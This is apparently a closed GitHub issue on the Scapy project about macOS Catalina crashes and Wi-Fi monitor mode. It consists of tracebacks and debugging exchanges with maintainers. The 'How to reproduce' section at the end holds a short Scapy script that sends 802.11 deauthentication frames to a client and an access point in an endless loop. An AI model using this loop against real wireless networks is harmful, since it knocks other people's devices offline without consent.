Closed mickael-btc closed 5 years ago
This is very probably a Catalina bug (still the beta). The fact that it shuts down is a sign of a pretty severe failure :/ this should probably get reported, though they probably know about it already.
It is also possible that they have changed the way we should set an interface into monitor mode (we were using a sort of hack), therefore Scapy would need an update.
Even if Scapy requires changes, we can't do much before the official release..
Thank for your answer. I'll wait the release to see changes. hope it will be fixed.
Do you have a similar effect with tcpdump --monitor-mode
or /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport
?
when I run these two commands my wifi logo changes to monitor mode
airport en0 sniff
sudo tcpdump -Ii en0
Code and command below changes wifi to promisc mode only :
from scapy.all import *
conf.use_pcap
p = sniff()
p.summary()
sudo tcpdump -i en0
sudo tcpdump -I en0
sudo tcpdump --monitor-mode
when I run these lines I got an error: tcpdump: pktap: That device doesn't support monitor mode
Yesterday i reinstalled scapy, pypcap, libdnet and some other package and i noticed that my mac doesn' shut down anymore (exept when i write conf.use_pcap = False
instead of conf.use_pcap = True
.
Now the script run "fine" in python 2.7.16 an 3.7 without crashing. But it still doesn't deauth devices and still doesn't put MacOS in monitor mode even if I can sniff with scapy on promisc mode.
when i interrupt the script with ^C i got a message in two versions of python :
File "/Users/rubikon/Desktop/script.py", line 11, in <module>
sendp(pkt, iface="en0", monitor=True)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/sendrecv.py", line 326, in sendp
socket = conf.L2socket(iface=iface, *args, **kargs)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
self.outs = open_pcap(iface, MTU, self.promisc, 100)
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 435, in <lambda>
open_pcap = lambda *args, **kargs: _PcapWrapper_pcapy(*args, **kargs) # noqa: E501
File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 398, in __init__
self.pcap = pcap.open_live(device, snaplen, promisc, to_ms) # noqa: E501
KeyboardInterrupt
File "/Users/rubikon/Desktop/script.py", line 11, in <module>
sendp(pkt, iface="en0", monitor=True)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 326, in sendp
socket = conf.L2socket(iface=iface, *args, **kargs)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
self.outs = open_pcap(iface, MTU, self.promisc, 100)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 341, in <lambda>
open_pcap = lambda *args, **kargs: _PcapWrapper_pypcap(*args, **kargs) # noqa: E501
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 308, in __init__
self.pcap = pcap.pcap(device, snaplen, promisc, immediate=1, timeout_ms=to_ms, rfmon=monitor) # noqa: E501
KeyboardInterrupt
Its probably useless but on sais jamais...
I am surprised that the other methods does not crash macOS too. What does this command do?
$ cat test_sniff.py
from scapy.all import *
s = sniff(count=1, timeout=1, monitor=True)
if len(s):
s.nsummary()
I get that error in two version of python:
Traceback (most recent call last):
File "test.py", line 3, in <module>
s = sniff(count=1, timeout=1, monitor=True)
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 836, in sniff
*arg, **karg)] = iface
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 58, in __init__
(self.ins, self.dev_bpf) = get_dev_bpf()
File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/core.py", line 98, in get_dev_bpf
raise Scapy_Exception("No /dev/bpf handle is available !")
scapy.error.Scapy_Exception: No /dev/bpf handle is available !
currently i'm using scapy 2.4.2 with changes made by you in /arch/unix.py. I think it's a catalina problem : i found software on mac os that can deauth but they won't work too. Do you have a link of working scapy version ?
You need to start the script as root.
oh sorry. when i ran in sudo mode i got:
2019-07-25 10:45:43.438 Python[17537:604634] NSSoftLinking - The function 'SLSIsSuppressedByScreenTime' can't be found in the (null) framework.
in python 2.7
0000 RadioTap / Dot11FCS / Dot11Beacon / SSID='orange' / Dot11EltRates / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11EltVendorSpecific / Dot11EltVendorSpecific
in python 3.7
I don't know what this error means, however the RadioTap
header means that the monitoring mode works fine as you are able to sniff raw 802.11 frames.
I redid tests and yes the monitor mode is activated 😅 Thanks a lot. The issue was that i didn't run
sudo airport -z
the first time. But I have a question : why i can't deauth a device ? Is there a bug or is my code wrong ?
I am not sure that 802.11 injection with Scapy was ever tested on macOS =\
I can't inject on macOS 10.14 either, and did not find a tool that can. I believe that this is not related to Scapy.
Please reopen the issue if you find a tool that can inject frames.
Brief description
Environment
scapy 2.4.3rc3.dev18
2.7.16
MacOS Catalina beta 4
How to reproduce
from scapy.all import *
conf.use_pcap = True
#real MAC adresses are hiden
ap = "FF:FF:FF:FF:FF:FF"
c = "FF:FF:FF:FF:FF:FF"
pkt=RadioTap()/Dot11(addr1=c, addr2=ap, addr3=ap)/Dot11Deauth(reason=2)
pkt1=RadioTap()/Dot11(addr1=ap, addr2=c, addr3=c)/Dot11Deauth(reason=2)
while True:
sendp(pkt, iface="en0", monitor=True)
sendp(pkt1, iface="en0", monitor=True)
Actual result
Expected result